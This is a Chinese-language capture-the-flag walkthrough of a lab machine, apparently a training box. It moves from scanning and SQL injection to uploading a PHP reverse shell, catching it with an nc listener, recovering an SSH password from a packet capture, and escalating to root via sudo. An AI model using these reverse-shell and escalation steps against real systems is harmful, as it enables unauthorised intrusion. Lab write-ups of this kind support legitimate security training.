一、信息收集
1.查看MAC地址
2.主机探测
arp-scan -l
3.端口扫描
nmap -A -v -T4 192.168.172.175 -p 1-65535
4.目录扫描
扫出了两个目录
二、内网渗透
打开80端口,并没有其他功能点
拼接扫出的目录,发现没有内容
拼接第二个目录,除了一张没有用的图片,后面还存在10个问题且为判断
那么我们想将正确用1表示错误用0表示
即最后的结果为0110111001
没有找到需要用的到密码的地方,猜想是否为一个目录,拼接查看
发现页面发生跳转,打开一个网页,在页面上寻找功能点
在该URL下跑出了一个SQL注入
尝试利用,在gereksiz表单中存在一个URL
但是好像被加密过,尝试解密
解密地址:https://cryptii.com/pipes/caesar-cipher
拼接访问
http://192.168.172.175/nt4stopc/0110111001/summertimesummertime/uvuvwevwevwe-onyetenyevwe-ugwemuhwem-osas/
打开一个如上页面,依旧没有任何功能点
想到后面还有一个upload.php,拼接访问
终于找到一个类似文件上传处,但是没有上传按钮
猜测可能是隐藏掉了,查看源代码
尝试可不可以写入一个提交按钮,发现可以写入
上传一个反弹shell的php文件
利用kali上的反弹shell文件,将其上传到该网站下
locate php-reverse-shell.php
cp /usr/share/webshells/php/php-reverse-shell.php .
nano php-reverse-shell.php #IP修改为kali
成功爆出路径
发现文件提示好像是以osas尾数,MD5值命名
将文件名进行MD5加密
kali监听4444端口
nc -lvvp 4444
访问文件
http://192.168.172.175/nt4stopc/0110111001/summertimesummertime/uvuvwevwevwe-onyetenyevwe-ugwemuhwem-osas/osas/8f218f759515e36eab5b4461430994f6.php
成功反弹
获取交互式shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
三、提权
cd /var/www/html
ls
猜测important.pcapng可能是一个路径
访问下载这个文件
利用Wireshark进行流量分析
发现在email处有ssh密码通过url解码得到:mklpc-osas112.
email=mkelepce&message=Hello+there%2C+The+password+for+the+SSH+account+you+want+is%3A+mkelepce%3Amklpc-osas112.+If+you+encounter+a+problem%2C+just+mail+it.++Good+work
URL解码
ssh进行远程连接
连接成功
发现依旧不是最高权限,再次提权
sudo -l
发现是(ALL : ALL) ALL:表示用户可以在任何主机上以任何用户身份执行任何命令。
sudo su
提权成功